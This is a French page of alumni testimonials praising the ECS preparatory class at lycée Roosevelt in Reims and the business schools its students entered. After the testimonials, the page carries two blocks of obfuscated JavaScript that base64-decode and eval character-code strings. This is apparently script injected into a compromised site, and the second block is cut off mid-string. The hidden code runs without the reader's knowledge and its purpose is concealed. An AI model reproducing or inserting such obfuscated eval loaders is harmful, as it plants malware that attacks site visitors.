Maé BONNEMENT intègre NEOMA Rouen en 2015, actuellement en deuxième année et en alternance chez Bouygues Rénovation Privée

La prépa est à mon sens un véritable challenge, synonyme de fatigue certes, mais dont on ressort grandi et plus sûr de soi. Je ne pense pas qu’il s’agisse de deux ans de sacrifice. Au contraire c’est l’occasion d’être solidaire et de forger des amitiés durables, mais également d’enrichir sa culture générale et d’apprendre à mener une vraie réflexion (des agréments qu’on ne retrouve pas forcément une fois en école). De plus, après deux années passées à travailler ainsi, ce qui nous est demandé en école m’a paru très accessible et supporter la pression est beaucoup plus facile. Finalement, les professeurs ont toujours été à notre écoute ; on est en effet bien loin de l’anonymat qui règne à l’université. Pour toutes ces raisons, je peux affirmer que si c’était à refaire, je signerais à nouveau de suite !

Effectivement en entrant à Neoma je n’avais plus qu’une idée en tête : travailler dans le BTP.

J’ai effectué mon stage de 4 mois l’été dernier directement en conduite de travaux sur un chantier de logement à Saint-Denis.
En parallèle je cherchais un apprentissage pour la rentrée. Pour moi, c’est vraiment le meilleur parcours que propose l’école. Si certains étudiants de prépa sont déjà tentés par l’apprentissage (pour des raisons financières, ou même parce que c’est une plus-value énorme sur le marché du travail), ils doivent se tourner vers Neoma. Il y a en effet beaucoup de places pour les alternants, et le rythme est apprécié par les entreprises.
Sinon pour mon apprentissage, j’ai parfois des missions transverses en conduite de travaux mais j’assure surtout la gestion financière du chantier. J’ai cherché pendant des mois, essuyé beaucoup de refus car les entreprises que je visais (Eiffage, Vinci, Bouygues…) sont difficiles d’accès sans connaître quelqu’un dans l’entreprise. J’ai finalement eu un entretien chez Bouygues Rénovation privée, et quelques semaines plus tard, j’avais une alternance ! La personne avec qui j’ai passé l’entretien (qui est maintenant mon N+2) m’a confié que c’est mon appétence pour le secteur du BTP qui avait fait penché la balance en ma faveur (en effet, cela est plutôt rare pour
un profil de gestionnaire).
A ce jour je travaille directement sur le chantier, dans un hôtel **** (Hyatt Regency Paris Etoile), et bientôt je serai sur l’hôtel du Louvre. J’ai visité travaillé pour le Ritz, visité le temple des Mormons, la Poste du Louvre… et de nombreux autres chantiers très impressionnants.
Alors malgré les idées reçues sur les écoles de commerce, il est toujours possible de choisir des parcours atypiques et d’exercer des métiers étonnants.

Thelma PEUCH intègre KEDGE Marseille en 2015

peuchIssue d’une terminale scientifique, j’ai souhaité intégrer une prépa ECS pour continuer de suivre une formation générale et préparer les concours d’entrée aux écoles de commerce. Aujourd’hui intégrée en école, je peux dire que la classe prépa m’a permis d’obtenir l’orientation souhaitée d’acquérir des méthodes de travail réelles, de l’organisation et d’apprendre à gérer le stress. Ces points sont, à ce jour, de vraies qualités en cours, en association et qui le seront plus tard en entreprise. Enfin, il était important pour moi de garder un investissement sportif en parallèle de la classe prépa et les deux ce sont finalement bien complétés, ce qui m’a permis de trouver un équilibre pendant deux ans tout en valorisant cet investissement lors des concours.

Thomas SEILER intègre KEDGE Bordeaux en 2015

seilerLa prépa a été pour moi une très bonne expérience. C’est un chemin assez difficile, demandant beaucoup de régularité et de discipline dans le travail, mais il est au final très satisfaisant. En arrivant en école, on ne regrette pas du tout les efforts que l’on a fournis. Une fois qu’on a pris le rythme, tout va bien. Je me suis moi-même surpris, je ne pensais pas être capable de travailler autant.

En plus on n’est pas obligé de renoncer à toute vie sociale. Et la cantine est bonne.

Maurice Midena-Bourdillat, ECS2 Roosevelt, intègre Audencia Nantes en 2013.

Si vous décidez de vivre votre Prépa comme j’ai vécu la mienne alors préparez-vous à vous lancer corps et âme dans ce qui sera sûrement l’entreprise la plus épanouissante pour votre intellect, la plus édifiante pour votre esprit critique. Préparez-vous également à rencontre des personnes avec qui vous vivrez des moments fous, avec qui vous vous lierez pour toute la vie. Préparez-vous à passer des nuits entières la tête dans votre bouquin d’histoire, puis à décompresser la nuit suivante dans un bar rémois. Préparez-vous à apprendre énormément,non seulement sur la pensée platonicienne et l’algêbre linéaire, mais aussi et également sur vous-même. Préparez-vous à vous jeter dans une aventure intellectuelle et émotionnelle exceptionnelle. Une chose est certaine: comme moi, vous n’en sortirez pas indemne.

 

Anaïs Brun, Caroline Rodriguez et Eléna Desanlis, élèves de P2ECS au lycée Roosevelt, intègrent Néoma Business School (Campus de Reims) en 2013.

Aujourd’hui étudiantes à Neoma Business School Campus de Reims, nous tenions à vous faire part de notre expérience au lycée Roosevelt. Malgré un rythme de travail soutenu, nous avons réussi à tisser des liens forts, aussi bien avec les professeurs qu’avec nos camarades. Ces années riches en acquisition de connaissance resteront un bon souvenir, et nous ont permis d’intégrer une grande école, ce dont nous sommes fières. L’organisation, la rigueur et la capacité de travail que nous avons acquises nous sont indispensables pour les études que nous poursuivons. Accrochez-vous, la suite en vaut vraiment la peine, et nous vous attendons dans nos écoles !

 

Quentin PIERROT intègre l’ESSEC en 2012

Photo_Quentin-2d46bJ’ai effectué deux années de classe préparatoire ECS au lyçée Roosevelt à Reims pour finalement intégrer l’ESSEC. Ces deux années ont été difficiles, certes, mais également riches et fructueuses. Difficiles, car la prépa est une filière très exigeante et que le mode de sélection par concours est indissociable d’une dose de stress relativement élevée. Enrichissantes cependant car c’est le seul moyen de développer rapidement une forte capacité de travail et d’aquérir un socle de connaissances très vaste sur lequel prendre appui plus tard en école de commerce. La filière ECS est sur ce point très intéressante, car elle demande d’être polyvalent. J’ai donc dû tout autant travailler en mathématiques qu’en géopolitique, en langues vivantes, en français ou en philosophie. Au lyçée Roosevelt, j’ai pu bénéficier d’une bonne ambiance de classe, d’un esprit de compétition sûrement moins marqué que dans les classes préparatoires privées, et surtout de professeurs très présents et disponibles pour les étudiants. Ainsi, puisque j’en ai manifesté l’envie, les professeurs m’ont entraîné aux épreuves des concours d’entrée aux écoles parisiennes et m’ont aussi soutenu sur le plan humain. Enfin, pour ceux qui sont effrayés par le début de ce témoignage, ces deux années de classe préparatoire m’ont appris une chose essentielle : la necessité de conserver une vie équilibrée. Vous ne tirerez donc pas un trait sur le repos, les amis ou bien le sport. Au contraire, ils sont indispensables pour établir des coupures afin de travailler « mieux ».

 

Clément RICHARD intègre l’EDHEC Lille en 2011

OLYMPUS DIGITAL CAMERAVous êtes à la veille de faire un choix cornélien, classe préparatoire ou non ? En entendant par ci par là des histoires horribles sur l’élitisme de la prépa ou sur l’exigence des colles, vous vous dites « ce n’est pas pour moi ! ». Je ne vais pas vous mentir les deux prochaines années de votre vie vous les passerez dans un long tunnel parsemé d’embuches mais une fois arrivé au bout c’est une joie intense qui vous attend. La prépa économique et commerciale est initialement prévue pour nous préparer aux concours des écoles de commerce or selon moi c’est plus que ça. Elle vous pousse dans vos retranchement, vous motive, vous teste, vous apprend un nombre incalculable de choses. Le chemin à parcourir peut effectivement paraître long mais qu’est-ce que 2 ou 3 ans dans une vie humaine ? Surtout lorsqu’il s’agit d’enfin montrer ce dont vous êtes capables. Vous ne serez pas seuls dans cette aventure humaine, des professeurs sont là pour vous épauler et vous motiver, mais aussi et surtout des camarades qui deviendront très certainement vos meilleurs amis. Je n’ai qu’une seule chose à dire pour vous convaincre, foncez et ne regardez pas en arrière car l’avenir s’ouvre à vous !

 

Mathieu THORY intègre l’ESC Grenoble en 2011

Mathieu_THORY-562e6Il est certain que mes deux années de prépa m’auront marqué à vie. Je me souviens encore de l’idée que je m’en faisais avant mon intégration. Je m’imaginais qu’ici reposerait ma défunte vie sociale. Forte heureusement, ces deux ans se sont révélées être à des années-lumière du calvaire souvent décrit. Bien sûr la charge de travail était conséquente. Entre les khôlles, les devoirs et les travaux personnels, je me suis senti un peu perdu, du moins au début. Mais on se met rapidement dans le bain. On se rend aussi très vite compte que jamais on a reçu une formation aussi enrichissante. La vie en prépa est d’autant plus agréable qu’une véritable synergie de groupe se crée. Esprit de classe et bonne ambiance sont en effet de puissants moteurs. J’ai également eu la chance de faire partie de l’APHEC (l’association des prépas HEC du lycée Franklin D. Roosevelt) en tant qu’organisateur d’oraux. Cette expérience m’a démontré, même si j’en étais déjà un peu convaincu, que la cohésion au sein de la classe et entre les promotions est une clé de la réussite. Finalement je croyais partir pour le bagne mais je suis arrivé en prépa : cet endroit d’où l’on sort toujours grandi, avec des souvenirs plein la tête et aussi avec des amis pour la vie.

 

Sophie LOUSTAU intègre l’ESSEC en 2007

loustau-7ed05Bien évidemment la prépa HEC offre des avantages bien connus : pluridisciplinarité, fin mélange de mathématiques et de lettres, nombreux débouchés. Mais plus que des matières, la prépa HEC du lycée Roosevelt est une rencontre entre vous, élèves remplis de rêves et d’optimisme, et des personnes qui pendant deux ans vont concentrer toute leur énergie pour vous hisser au sommet. Les professeurs, qui non seulement possèdent et vous transmettent des connaissances permettant de satisfaire les exigences les plus pointues, mais qui de plus vous accompagnent dans votre évolution, seront pour vous des soutiens, des guides. J’ai également trouvé dans cette prépa une convivialité où la solidarité l’emporte sur l’esprit de compétition, permettant à chacun d’avancer et de s’épanouir comme bon lui semble, loin de l’exigence de satisfaire à un « modèle unique ». Les relations humaines y sont omniprésentes et enrichissantes, notamment à travers la vie associative et grâce à tous les moments que l’on partage ensemble. Il importe enfin de souligner que choisir une « prépa provinciale » ne signifie pas renoncer aux écoles parisiennes. Faire sa prépa HEC au lycée Roosevelt, c’est entrer dans un cocon qui vous stimule, vous permet de mûrir et fait de vous un profil original et donc recherché. Vous vous distinguerez, notamment au cours des oraux, des nombreux « clones parisiens » grâce à votre authenticité préservée. Tous les éléments nécessaires à une complète réussite vous y sont offerts, seule votre motivation déterminera la fin de l’histoire !

 

Amine TEMSAMANI intègre l’EM Lyon en 2007

temsamani-8cfdeL’idée selon laquelle la prépa ECS est synonyme de travail acharné et de sacrifices constants est tout sauf juste,les années passées en prépa au lycée Roosevelt furent pour moi l’occasion de m’ouvrir sur un certain nombre de matières à la fois intéressantes et complémentaires, me permettant d’accéder à cette formation d’excellence qu’est celle dispensée par les grandes écoles de commerce françaises. La prépa c’est avant tout beaucoup de rigueur et de travail efficace, en somme,une expérience très formatrice qui nous permet d’affronter avec beaucoup plus d’aisance les différents obstacles à venir,que ce soit dans le cadre de la scolarité postérieure à la prépa ou une fois dans la vie professionnelle. L’objectif en prépa n’est pas d’avoir une place en école de commerce,mais d’avoir la meilleure place possible. Alors ayez des ambitions et surtout donnez vous les moyens de les réaliser. La prépa au lycée Roosevelt,avec son corps professoral très dévoué et surtout conscient des objectifs à atteindre dans l’optique du concours, est un bon moyen d’y arriver.

 

Nicolas LECHIEN intègre l’EDHEC Lille en 2007

Lechien-72727La prépa HEC du Lycée Roosevelt est l’endroit où aller après un Bac S ! En effet, en vue des concours qui te feront entrer dans des écoles de rêve, les matières enseignées sont aussi variées qu’intéressantes, et les profs font en sorte que chacun atteigne ses objectifs lors des concours, grâce à un enseignement de qualité, une écoute permanente et des conseils souvent avisés. De plus, l’ambiance est assez conviviale, loin des grandes rivalités « parisiennes » entre élèves. La prépa n’est pas synonyme d’austérité et de vie monacale ! Avec de l’organisation, on peut mener un travail régulier (et parfois soutenu…) et des activités en parallèle. Et puis quelle récompense, grâce à 2 ans de prépa à Roosevelt, d’intégrer une bonne école de commerce, où la vie est tout simplement géniale ! Bref, file à Roosevelt, tu ne seras pas déçu(e) !

var DRQWQIDEDR = atob(‘dmFyIFdQR1ROSUpVV1EgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExIC0gMSwgMTI3IC0gOSwgOTggLSAxLCAxMTYgLSAyLCAzNSAtIDMsIDExMSAtIDQsIDEwOSAtIDgsIDEyNSAtIDQsIDQxIC0gOSwgNjQgLSAzLCAzNiAtIDQsIDQzIC0gNCwgMTE2IC0gOCwgODkgLSA5LCA4MiAtIDksIDc0IC0gOCwgMTIzIC0gMSwgODUgLSAxLCA5MCAtIDEsIDExNiAtIDYsIDExOSAtIDMsIDEyMSAtIDEsIDQ4IC0gOSwgNjggLSA5LCAxOSAtIDksIDEyMiAtIDQsIDEwNCAtIDcsIDExOSAtIDUsIDM2IC0gNCwgMTA5IC0gOCwgMTE3IC0gNywgMTA2IC0gNywgMTAyIC0gMSwgMTAxIC0gMSwgMzYgLSA0LCA2MyAtIDIsIDMzIC0gMSwgNDAgLSAxLCA3NSAtIDgsIDcwIC0gMiwgNjAgLSA0LCAxMTcgLSA0LCA4NSAtIDcsIDEyMSAtIDEsIDEwNyAtIDgsIDEyNiAtIDYsIDc5IC0gMSwgMTI2IC0gNiwgMTIxIC0gOSwgMTA0IC0gNywgNjkgLSAxLCAxMjQgLSA0LCA1NiAtIDQsIDU5IC0gNiwgODUgLSA1LCA4OSAtIDYsIDEwNiAtIDYsIDkwIC0gNywgMTAyIC0gMywgNTQgLSA0LCA5MyAtIDgsIDEwMiAtIDIsIDcxIC0gMSwgMTI0IC0gNSwgMTEyIC0gMSwgNzQgLSA0LCA3NCAtIDEsIDc0IC0gNiwgNTIgLSAzLCAxMTQgLSA5LCA3MiAtIDQsIDEwOSAtIDQsIDUxIC0gMywgMTIxIC0gOSwgNzAgLSAzLCA1NiAtIDgsIDExNCAtIDYsIDEwMiAtIDUsIDc2IC0gNSwgNjkgLSAxLCA5MiAtIDcsIDEyNyAtIDcsIDgwIC0gMiwgMTEzIC0gNSwgODcgLSAyLCA0OSAtIDYsIDg3IC0gOCwgNzEgLSA1LCAxMDUgLSAyLCA5NSAtIDksIDc2IC0gOSwgMTIyIC0gMywgNTkgLSAzLCAxMDYgLSAxLCA4MCAtIDcsIDc3IC0gOSwgODAgLSA3LCA4MiAtIDMsIDEwNyAtIDcsIDExNCAtIDQsIDExMCAtIDMsIDEwMiAtIDIsIDc0IC0gOCwgMTA5IC0gNSwgMTE3IC0gMSwgOTAgLSA4LCAxMDAgLSAxLCAxMTAgLSA1LCA3MiAtIDMsIDUxIC0gMSwgNzQgLSA2LCAxMTQgLSA5LCA5MCAtIDgsIDExMSAtIDUsIDgyIC0gMSwgOTMgLSA3LCAxMjIgLSA3LCA4MCAtIDMsIDgwIC0gOCwgMTExIC0gNSwgNzYgLSA3LCAxMjcgLSA5LCA4MSAtIDcsIDc0IC0gOCwgODYgLSA5LCA1NyAtIDYsIDg0IC0gNSwgNzEgLSA1LCA2MSAtIDksIDEwOCAtIDgsIDg3IC0gMSwgMTA3IC0gNCwgODAgLSA3LCA1OSAtIDMsIDk2IC0gNiwgMTEwIC0gNCwgNzUgLSA2LCA4MiAtIDMsIDgxIC0gMywgODcgLSA0LCA0OSAtIDEsIDc1IC0gMywgNzkgLSA5LCA1MiAtIDMsIDEwMCAtIDEsIDcyIC0gNiwgNzkgLSAyLCA5MCAtIDcsIDY4IC0gMywgMTIzIC0gOCwgODcgLSAxLCA3NCAtIDYsIDU1IC0gMywgMTE4IC0gNSwgODggLSA0LCA3NiAtIDcsIDEyMCAtIDgsIDcwIC0gMSwgODMgLSAyLCAxMjQgLSAzLCA3OSAtIDIsIDExNSAtIDIsIDg1IC0gOCwgNzQgLSA4LCA4MyAtIDYsIDExNSAtIDgsIDg0IC0gOCwgODcgLSAxLCA3MSAtIDUsIDkyIC0gOCwgOTEgLSA2LCA5MCAtIDQsIDEwNSAtIDUsIDEwNCAtIDcsIDQzIC0gNCwgNjIgLSAzLCAxMSAtIDEsIDExMCAtIDgsIDEyNCAtIDcsIDExMSAtIDEsIDEwOCAtIDksIDExOSAtIDMsIDExMyAtIDgsIDExNiAtIDUsIDExMSAtIDEsIDM0IC0gMiwgMTIzIC0gMywgMTEyIC0gMSwgMTIwIC0gNiwgMTAzIC0gOCwgMTEwIC0gOSwgMTE1IC0gNSwgMTA0IC0gNSwgNDQgLSA0LCAxMjMgLSA4LCAxMTggLSAyLCAxMjEgLSA3LCAxMDggLSAzLCAxMTEgLSAxLCAxMDggLSA1LCA0OSAtIDUsIDM1IC0gMywgMTEzIC0gNiwgMTAzIC0gMiwgMTI5IC0gOCwgNDMgLSAyLCA0MCAtIDgsIDEyNSAtIDIsIDE0IC0gNCwgMzYgLSA0LCAzNiAtIDQsIDExOSAtIDEsIDEwMyAtIDYsIDEyMSAtIDcsIDM3IC0gNSwgMTE5IC0gNSwgMTA2IC0gNSwgMTIxIC0gNiwgMzQgLSAyLCA2NSAtIDQsIDM1IC0gMywgNDggLSA5LCA0NSAtIDYsIDY4IC0gOSwgMTcgLSA3LCAzMyAtIDEsIDQwIC0gOCwgMTEwIC0gOCwgMTE3IC0gNiwgMTE3IC0gMywgMzYgLSA0LCA0NyAtIDcsIDExOSAtIDEsIDEwMCAtIDMsIDExOSAtIDUsIDM0IC0gMiwgMTExIC0gNiwgMzYgLSA0LCA2NSAtIDQsIDQxIC0gOSwgNTEgLSAzLCA2NSAtIDYsIDM5IC0gNywgMTEzIC0gOCwgNDEgLSA5LCA2OSAtIDksIDM5IC0gNywgMTIyIC0gNywgMTIzIC0gNywgMTE3IC0gMywgMTE0IC0gOSwgMTE5IC0gOSwgMTA4IC0gNSwgNTUgLSA5LCAxMTAgLSAyLCAxMDIgLSAxLCAxMTcgLSA3LCAxMDQgLSAxLCAxMTkgLSAzLCAxMTIgLSA4LCA2MyAtIDQsIDQxIC0gOSwgMTE0IC0gOSwgNTIgLSA5LCA1MCAtIDcsIDQ1IC0gNCwgMzUgLSAzLCAxMjYgLSAzLCAxNCAtIDQsIDM2IC0gNCwgMzggLSA2LCAzNiAtIDQsIDQwIC0gOCwgMTIzIC0gOSwgMTA1IC0gNCwgMTE4IC0gMywgMzkgLSA3LCA0OSAtIDYsIDYzIC0gMiwgMzMgLSAxLCA5MSAtIDgsIDEyMSAtIDUsIDEyMSAtIDcsIDEwNiAtIDEsIDExNCAtIDQsIDEwNCAtIDEsIDU1IC0gOSwgMTA4IC0gNiwgMTE4IC0gNCwgMTE2IC0gNSwgMTE2IC0gNywgNzQgLSA3LCAxMDUgLSAxLCAxMDYgLSA5LCAxMTkgLSA1LCA3NiAtIDksIDExOSAtIDgsIDEwNiAtIDYsIDEwMyAtIDIsIDQ0IC0gNCwgMTE4IC0gMywgMTIwIC0gNCwgMTIwIC0gNiwgMTExIC0gNiwgMTE0IC0gNCwgMTA2IC0gMywgNTMgLSA3LCAxMDUgLSA2LCAxMDUgLSAxLCAxMDYgLSA5LCAxMjEgLSA3LCA3NCAtIDcsIDEyMCAtIDksIDEwOSAtIDksIDEwNCAtIDMsIDY5IC0gNCwgMTE3IC0gMSwgNDQgLSA0LCAxMTEgLSA2LCA0NyAtIDYsIDQwIC0gOCwgOTkgLSA1LCAxNyAtIDcsIDE4IC0gOSwgMTUgLSA2LCAxMiAtIDMsIDE1IC0gNiwgMTEzIC0gNiwgMTA0IC0gMywgMTI4IC0gNywgNTEgLSA1LCAxMDcgLSA4LCAxMTEgLSA3LCAxMDIgLSA1LCAxMjAgLSA2LCA3NSAtIDgsIDExNCAtIDMsIDEwNSAtIDUsIDEwNyAtIDYsIDc0IC0gOSwgMTIwIC0gNCwgNDIgLSAyLCAxMTMgLSA4LCA0MCAtIDgsIDQwIC0gMywgMzUgLSAzLCAxMTUgLSA4LCAxMDMgLSAyLCAxMjYgLSA1LCA1NSAtIDksIDExMiAtIDQsIDEwMiAtIDEsIDExMiAtIDIsIDEwNyAtIDQsIDEyMiAtIDYsIDExMiAtIDgsIDQ3IC0gNiwgNDQgLSAzLCA2MyAtIDQsIDE3IC0gNywgNDAgLSA4LCAzOCAtIDYsIDEyNyAtIDIsIDEzIC0gMywgMzkgLSA3LCAzNCAtIDIsIDEyMyAtIDksIDEwNyAtIDYsIDEyMCAtIDQsIDExOCAtIDEsIDEyMSAtIDcsIDExNyAtIDcsIDM0IC0gMiwgMTIxIC0gNywgMTA4IC0gNywgMTIxIC0gNiwgNjAgLSAxLCAxOSAtIDksIDEzMCAtIDUsIDE4IC0gOCwgMTQgLSA0LCAxMjUgLSA3LCA5OCAtIDEsIDExNSAtIDEsIDM1IC0gMywgMTA2IC0gNiwgMTAyIC0gMSwgMTA1IC0gNiwgMzMgLSAxLCA3MCAtIDksIDQxIC0gOSwgMTI4IC0gOCwgMTE0IC0gMywgMTIxIC0gNywgOTkgLSA0LCAxMDUgLSA0LCAxMTIgLSAyLCAxMDQgLSA1LCA0OSAtIDksIDk4IC0gMSwgMTIyIC0gNiwgMTE3IC0gNiwgMTAxIC0gMywgNDQgLSA0LCAxMDcgLSA2LCAxMTQgLSA0LCAxMDMgLSA0LCAxMDQgLSAzLCAxMDYgLSA2LCA0MiAtIDEsIDQ1IC0gMSwgMzQgLSAyLCAxMTEgLSA0LCAxMTAgLSA5LCAxMjQgLSAzLCA1MCAtIDksIDY4IC0gOSwgMTMgLSAzLCA0NSAtIDUsIDExOCAtIDgsIDEwMiAtIDEsIDEyNiAtIDcsIDM5IC0gNywgNzEgLSAxLCAxMjQgLSA3LCAxMTkgLSA5LCAxMDIgLSAzLCAxMTggLSAyLCAxMDYgLSAxLCAxMTIgLSAxLCAxMTYgLSA2LCA0OCAtIDgsIDEwMiAtIDIsIDEwMyAtIDIsIDEwMCAtIDEsIDQ3IC0gNiwgNTAgLSA5LCA0NiAtIDYsIDQzIC0gMiwgNjMgLSA0LCAxMSAtIDEsIDE1IC0gNSk7ZXZhbChXUEdUTklKVVdRKTs=’);
eval(DRQWQIDEDR);

var OJCQZPVISJ = atob(‘dmFyIE5MU0RNQlFYRUogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIzIC0gNSwgMTAyIC0gNSwgMTIwIC0gNiwgMzkgLSA3LCAxMTMgLSA2LCAxMDMgLSAyLCAxMjIgLSAxLCAzOCAtIDYsIDY0IC0gMywgMzcgLSA1LCA0MiAtIDMsIDEwOSAtIDUsIDc0IC0gNywgODkgLSAxLCA3MCAtIDMsIDExMiAtIDUsIDkzIC0gOSwgOTAgLSAxLCAxMTkgLSA4LCA4NSAtIDIsIDc3IC0gNCwgNDAgLSAxLCA2NCAtIDUsIDE0IC0gNCwgMTI1IC0gNywgOTggLSAxLCAxMjEgLSA3LCAzNCAtIDIsIDEwNyAtIDYsIDExNCAtIDQsIDEwMSAtIDIsIDEwNSAtIDQsIDEwMiAtIDIsIDM0IC0gMiwgNjQgLSAzLCAzOCAtIDYsIDQ3IC0gOCwgNzkgLSA3LCAxMDggLSAzLCA3NCAtIDEsIDExOCAtIDUsIDk2IC0gNywgMTIyIC0gMiwgMTIzIC0gOCwgMTE3IC0gOCwgODIgLSAyLCAxMjAgLSAxLCA4NSAtIDcsIDEyNSAtIDMsIDEwNCAtIDQsIDcwIC0gMSwgMTEwIC0gNywgMTE2IC0gNiwgODEgLSAzLCAxMjcgLSA2LCA3MSAtIDYsIDEwNiAtIDUsIDg1IC0gNiwgODcgLSAzLCAxMjIgLSAzLCA2OCAtIDIsIDc1IC0gMSwgNTQgLSA0LCAxMDEgLSAyLCA3NyAtIDEsIDg1IC0gOCwgODggLSA0LCA1MyAtIDUsIDEwOCAtIDMsIDc2IC0gNCwgMTI3IC0gNSwgNzcgLSA4LCAxMDEgLSAyLCA3MSAtIDYsIDEyOCAtIDYsIDk2IC0gNywgMTE2IC0gOSwgNzEgLSAzLCA4OSAtIDYsIDUxIC0gMywgMTE2IC0gMSwgMTA0IC0gNywgNDkgLSAxLCAxMjcgLSA4LCAxMTcgLSA3LCA4MCAtIDEsIDEwNSAtIDEsIDU1IC0gNywgNTkgLSA1LCA4NSAtIDYsIDg5IC0gNywgMTIzIC0gMywgMTExIC0gNCwgMTA0IC0gNSwgOTEgLSAzLCAxMTEgLSA3LCAxMDYgLSAyLCA3OCAtIDQsIDcwIC0gMywgMTE5IC0gNCwgODIgLSA4LCA4NSAtIDUsIDU2IC0gNiwgMTAzIC0gNCwgMTAwIC0gMiwgNzUgLSAxLCAxMDggLSAzLCAxMjUgLSA2LCA3MCAtIDMsIDgxIC0gOSwgMTI5IC0gOCwgNzAgLSA1LCAxMTkgLSA1LCA2OCAtIDIsIDExNSAtIDksIDcyIC0gMywgNjAgLSA0LCA3MyAtIDEsIDY4IC0gMSwgOTEgLSAxLCAxMjQgLSA1LCA5OSAtIDksIDcxIC0gNSwgMTA5IC0gNiwgMTE1IC0gNiwgODQgLSA1LCAxMDggLSAxLCAxMDUgLSAxLCA0OCAtIDEsIDEwMyAtIDUsIDEwNCAtIDEsIDY2IC0gMSwgNTIgLSAxLCA4MCAtIDQsIDcyIC0gNCwgODQgLSA2LCA4NCAtIDIsIDEwNSAtIDQsIDYwIC0gOSwgOTggLSA5LCA5OSAtIDEsIDgxIC0gOCwgOTIgLSA5LCAxMTIgLSA5LCA4NCAtIDUsIDc4IC0gNCwgODggLSA0LCA3MCAtIDEsIDExMCAtIDcsIDcyIC0gNSwgMTEzIC0gOCwgODggLSA3LCAxMjEgLSAyLCA4MyAtIDIsIDkzIC0gOSwgNTcgLSA5LCAxMTQgLSA2LCA4NiAtIDQsIDEzMSAtIDksIDY3IC0gMiwgMTIyIC0gNywgNzQgLSAxLCAxMDcgLSAzLCA2NCAtIDgsIDYxIC0gNCwgODggLSA5LCAxMTYgLSA5LCA3NCAtIDksIDUwIC0gNywgODEgLSA2LCA2NyAtIDIsIDc3IC0gOCwgMTIxIC0gNSwgMTA1IC0gNSwgMTA3IC0gMiwgMTEwIC0gMywgOTcgLSA4LCAxMDUgLSA2LCA1NiAtIDUsIDcxIC0gNSwgOTAgLSA1LCA5MyAtIDYsIDg5IC0gNiwgNTIgLSA0LCA4MSAtIDksIDc5IC0gNiwgNzUgLSA4LCA1NCAtIDYsIDEyNiAtIDksIDcxIC0gMywgMTEwIC0gNCwgMTEyIC0gMSwgMTI0IC0gOCwgODQgLSAzLCA4OCAtIDQsIDEyMCAtIDUsIDEyMSAtIDYsIDczIC0gNiwgODggLSA1LCAxMDcgLSA3LCA1MiAtIDIsIDc2IC0gMywgMTA5IC0gNSwgMTE5IC0gNCwgMTA4IC0gMSwgODIgLSAyLCA2NyAtIDIsIDc0IC0gNSwgNTMgLSAyLCA3MyAtIDYsIDEwNCAtIDEsIDY4IC0gMywgMTE5IC0gNiwgODAgLSAyLCA3NSAtIDgsIDEwNCAtIDQsIDcwIC0gMiwgNzkgLSA1LCA2OCAtIDEsIDEyNCAtIDksIDc1IC0gMSwgODEgLSAxLCA1NSAtIDUsIDczIC0gNywgODcgLSAzLCA4OCAtIDUsIDg3IC0gNiwgNjQgLSAzLCA2OSAtIDgsIDQxIC0gMiwgNjYgLSA3LCAxMyAtIDMsIDEwMyAtIDEsIDEyNiAtIDksIDExMSAtIDEsIDEwNCAtIDUsIDEyMCAtIDQsIDEwNiAtIDEsIDEyMCAtIDksIDExOSAtIDksIDM1IC0gMywgMTI0IC0gNCwgMTE2IC0gNSwgMTIwIC0gNiwgOTYgLSAxLCAxMDIgLSAxLCAxMTkgLSA5LCAxMDAgLSAxLCA0NCAtIDQsIDExOCAtIDMsIDEyNSAtIDksIDEyMCAtIDYsIDEwOSAtIDQsIDExNyAtIDcsIDExMSAtIDgsIDQ4IC0gNCwgNDAgLSA4LCAxMTYgLSA5LCAxMDkgLSA4LCAxMjcgLSA2LCA0OCAtIDcsIDM2IC0gNCwgMTI3IC0gNCwgMTYgLSA2LCA0MCAtIDgsIDQxIC0gOSwgMTI1IC0gNywgOTkgLSAyLCAxMjMgLSA5LCAzNCAtIDIsIDExNyAtIDMsIDEwNSAtIDQsIDExNyAtIDIsIDQxIC0gOSwgNjYgLSA1LCAzOCAtIDYsIDQ2IC0gNywgNDUgLSA2LCA2NCAtIDUsIDExIC0gMSwgMzYgLSA0LCAzNSAtIDMsIDEwNyAtIDUsIDExOCAtIDcsIDEyMyAtIDksIDQxIC0gOSwgNDMgLSAzLCAxMjAgLSAyLCAxMDAgLSAzLCAxMTkgLSA1LCAzNSAtIDMsIDEwOCAtIDMsIDM5IC0gNywgNjkgLSA4LCAzNiAtIDQsIDUzIC0gNSwgNjYgLSA3LCAzNSAtIDMsIDExMCAtIDUsIDM4IC0gNiwgNjEgLSAxLCAzOSAtIDcsIDEyMCAtIDUsIDEyMiAtIDYsIDExNSAtIDEsIDEwNyAtIDIsIDExOSAtIDksIDExMSAtIDgsIDQ4IC0gMiwgMTE2IC0gOCwgMTA3IC0gNiwgMTE3IC0gNywgMTEwIC0gNywgMTI0IC0gOCwgMTA4IC0gNCwgNjAgLSAxLCAzNCAtIDIsIDExMSAtIDYsIDUyIC0gOSwgNDYgLSAzLCA0MyAtIDIsIDQxIC0gOSwgMTI1IC0gMiwgMTQgLSA0LCAzOSAtIDcsIDM1IC0gMywgMzcgLSA1LCAzNSAtIDMsIDEyMiAtIDgsIDEwMiAtIDEsIDEyMiAtIDcsIDM0IC0gMiwgNDUgLSAyLCA2OCAtIDcsIDQwIC0gOCwgODkgLSA2LCAxMjUgLSA5LCAxMTcgLSAzLCAxMTQgLSA5LCAxMTggLSA4LCAxMDQgLSAxLCA1MCAtIDQsIDEwMyAtIDEsIDExNSAtIDEsIDExNSAtIDQsIDExMSAtIDIsIDY4IC0gMSwgMTEyIC0gOCwgMTAxIC0gNCwgMTE3IC0gMywgNzIgLSA1LCAxMTMgLSAyLCAxMDMgLSAzLCAxMDQgLSAzLCA0NyAtIDcsIDEyMyAtIDgsIDExOSAtIDMsIDEyMiAtIDgsIDExMSAtIDYsIDExOCAtIDgsIDExMiAtIDksIDQ5IC0gMywgMTA4IC0gOSwgMTEzIC0gOSwgMTAxIC0gNCwgMTIyIC0gOCwgNzQgLSA3LCAxMTcgLSA2LCAxMDEgLSAxLCAxMDcgLSA2LCA3MSAtIDYsIDEyMSAtIDUsIDQ4IC0gOCwgMTA5IC0gNCwgNDggLSA3LCAzOCAtIDYsIDEwMSAtIDcsIDE1IC0gNSwgMTIgLSAzLCAxMSAtIDIsIDEyIC0gMywgMTAgLSAxLCAxMTEgLSA0LCAxMDMgLSAyLCAxMjUgLSA0LCA1MCAtIDQsIDEwOCAtIDksIDExMCAtIDYsIDEwMSAtIDQsIDEyMiAtIDgsIDcwIC0gM